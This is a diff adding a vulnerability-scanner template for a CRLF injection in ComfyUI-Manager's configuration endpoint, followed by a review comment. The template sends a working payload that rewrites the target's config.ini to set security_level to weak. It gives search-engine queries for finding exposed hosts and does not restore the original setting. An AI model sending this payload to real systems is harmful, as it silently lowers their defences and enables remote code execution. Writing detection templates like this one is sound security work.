77 changes: 77 additions & 0 deletions http/cves/2026/CVE-2026-22777.yaml
@@ -0,0 +1,77 @@
id: CVE-2026-22777

info:
name: ComfyUI-Manager - CRLF Injection via Configuration Endpoint
author: LK-maker-007
severity: high
description: |
ComfyUI-Manager versions prior to 3.39.2 (and 4.0.0 through 4.0.4) are vulnerable to
CRLF injection in the /api/manager/db_mode configuration endpoint. The write_config()
function does not sanitize carriage return (\r) or newline (\n) characters from
user-supplied query parameter values before writing to the config.ini file. An
unauthenticated attacker can inject arbitrary key-value pairs, including downgrading
security_level from normal to weak, enabling subsequent remote code execution via the
same chain as CVE-2025-67303. Exploitation requires ComfyUI to be started with the
--listen flag (network-accessible mode).
impact: |
An unauthenticated attacker can overwrite security-critical configuration values
including security_level=weak, which unlocks custom node installation. This enables
subsequent remote code execution through a malicious custom node.
remediation: |
Upgrade ComfyUI-Manager to version 3.39.2 or 4.0.5 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2026-22777
- https://github.com/Comfy-Org/ComfyUI-Manager/security/advisories/GHSA-562r-8445-54r2
- https://github.com/Comfy-Org/ComfyUI-Manager/commit/f4fa394e0f03b013f1068c96cff168ad10bd0410
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score: 7.5
cve-id: CVE-2026-22777
cwe-id: CWE-93
epss-score: 0.00015
epss-percentile: 0.03132
cpe: cpe:2.3:a:comfy:comfyui-manager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: comfy
product: comfyui-manager
shodan-query: http.title:"ComfyUI" http.html:"/api/manager"
fofa-query: title="ComfyUI"
tags: cve,cve2026,comfyui,crlf,injection,config-injection,intrusive,vuln

flow: http(1) && http(2) && http(3)

http:
- method: GET
path:
- "{{BaseURL}}/api/manager/db_mode"

matchers:
- type: dsl
dsl:
- 'status_code == 200'
- '!contains(body, "<html")'
condition: and
internal: true

- method: GET
path:
- "{{BaseURL}}/api/manager/db_mode?value=cache%0Dsecurity_level%20=%20weak"

matchers:
- type: dsl
dsl:
- 'status_code == 200'
internal: true

- method: GET
path:
- "{{BaseURL}}/api/manager/db_mode"

matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "security_level = weak")'
condition: and
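Review bot: the template leaves the target permanently downgraded. Request 2 writes `security_level = weak` into config.ini via the CRLF payload, request 3 confirms it, and there is no cleanup step, so every scanned host is left with custom-node installation unlocked, which is exactly the precondition for the RCE chain the description mentions. The `intrusive` tag and `verified: true` do not mitigate that; the info block should state plainly that the check modifies the target's configuration, and the template should add a fourth request that re-injects `security_level%20=%20normal` (and, since request 1 reads `/api/manager/db_mode` but discards the response, an internal extractor on request 1 capturing the original db_mode value so the cleanup request can restore it rather than hard-coding `cache`). If the cleanup is added, `max-request: 3` and `flow: http(1) && http(2) && http(3)` need updating to match.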